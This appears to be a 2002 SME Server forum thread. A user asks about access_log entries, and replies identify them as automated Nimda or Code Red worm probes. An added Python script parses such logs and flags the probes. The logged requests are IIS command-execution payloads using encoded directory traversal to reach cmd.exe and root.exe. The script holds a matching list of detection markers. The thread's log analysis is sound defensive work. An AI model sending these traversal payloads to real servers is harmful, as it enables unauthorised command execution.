Koozali.org: home of the SME Server

Attach maybe

Kenneth Franklin

Attach maybe
« on: October 25, 2002, 03:42:17 AM »
I have got my SME 5.5 running and now I see this in my httpd/access_log:

www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:04:23 -0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:49 -0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
www.xxx.xxx 213.112.66.124 - - [25/Oct/2002:00:20:50 -0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
www.xxx.xxx 147.32.32.180 - - [25/Oct/2002:00:30:31 -0100] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"

I have replaced my address with x's.

This is just some of it. It happens all the time. I'm not so sure about reading the log, so could anyone please tell me what is going on.

Thanks

Kenneth Franklin

Kenneth Franklin

Re: Attach maybe
« Reply #1 on: October 25, 2002, 03:43:42 AM »
Oops, the subject should of course be "Attack maybe".

Dan Brown

Re: Attach maybe
« Reply #2 on: October 25, 2002, 03:47:00 AM »
This is either Code Red or Nimda (can't remember which at the moment).  Nothing to worry about on an apache server.
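As an added example (not from the original thread or from SME Server), the following Python script does the reading of the log that the question asks about: it parses lines in the same format as the access_log excerpt above (virtual host, then the Apache combined fields), flags requests carrying the markers of the IIS worm probes the reply names (root.exe, cmd.exe, and the double-encoded or overlong-UTF-8 "..\" traversal sequences), groups them by source IP and status code, and reports whether any such request was actually served. The sample log lines, hostnames and IP addresses are constructed for the example and modelled on the post's lines; on an Apache server these requests only ever produce 400/404, which is why the summary shows no successful hits.

```python
import re
from collections import Counter, defaultdict

# Apache combined log format with a leading virtual-host field, as in the post.
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Request-path markers typical of Nimda / Code Red II style probes against IIS:
# the root.exe backdoor, cmd.exe reached through /scripts or the /c and /d
# shares, and encoded "..\" traversals (double percent-encoding, overlong UTF-8).
WORM_MARKERS = (
    "root.exe", "cmd.exe",
    "..%255c", "..%c1%1c", "..%c0%2f", "..%c0%af", "..%c1%9c",
    "..%%35%63", "..%%35c", "..%25%35%63", "..%252f",
)


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")
    rec["method"] = parts[0] if parts else ""
    rec["path"] = parts[1] if len(parts) > 1 else ""   # version may be absent
    rec["status"] = int(rec["status"])
    return rec


def is_worm_probe(path):
    """True if the request path carries one of the known probe markers."""
    p = path.lower()
    return any(marker in p for marker in WORM_MARKERS)


def summarize(lines):
    """Group probe requests by source IP and status; list any that were served."""
    by_ip = defaultdict(Counter)
    succeeded = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_worm_probe(rec["path"]):
            continue
        by_ip[rec["ip"]][rec["status"]] += 1
        if 200 <= rec["status"] < 300:       # a 2xx would mean the target exists
            succeeded.append(rec)
    return {"by_ip": {ip: dict(c) for ip, c in by_ip.items()},
            "succeeded": succeeded}


# Constructed sample log lines (example hostnames and documentation IPs), shaped
# like the excerpt in the post, including one line without an HTTP version and
# one ordinary page request that must not be flagged.
SAMPLE_LOG = [
    'www.example.invalid 192.0.2.10 - - [25/Oct/2002:00:04:23 -0100] '
    '"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"',
    'www.example.invalid 192.0.2.10 - - [25/Oct/2002:00:04:23 -0100] '
    '"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"',
    'www.example.invalid 192.0.2.10 - - [25/Oct/2002:00:04:23 -0100] '
    '"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"',
    'www.example.invalid 198.51.100.7 - - [25/Oct/2002:00:30:31 -0100] '
    '"GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"',
    'www.example.invalid 203.0.113.5 - - [25/Oct/2002:00:31:00 -0100] '
    '"GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"',
]


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    for ip, statuses in report["by_ip"].items():
        print(f"{ip}: {statuses}")
    print("served probe requests:", len(report["succeeded"]))
```

Run against a real file with `summarize(open("/var/log/httpd/access_log"))`; a non-empty `succeeded` list is the only result that would warrant a closer look, since it would mean something on the server answered a path that should not exist.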

Kenneth Franklin

Re: Attach maybe
« Reply #3 on: October 25, 2002, 03:51:29 AM »
Thanks for the quick reply. So if I understand right, the PC behind the IPs I can see in the log is infected with either Code Red or Nimda and the person doesn't know about it (hopefully)?? Or is a person trying manually to get in using the above?

Dan Brown

Re: Attach maybe
« Reply #4 on: October 25, 2002, 04:14:21 AM »
Yep, your understanding is right.  It attacks automatically, and generally the owner of the server doesn't know it's happening.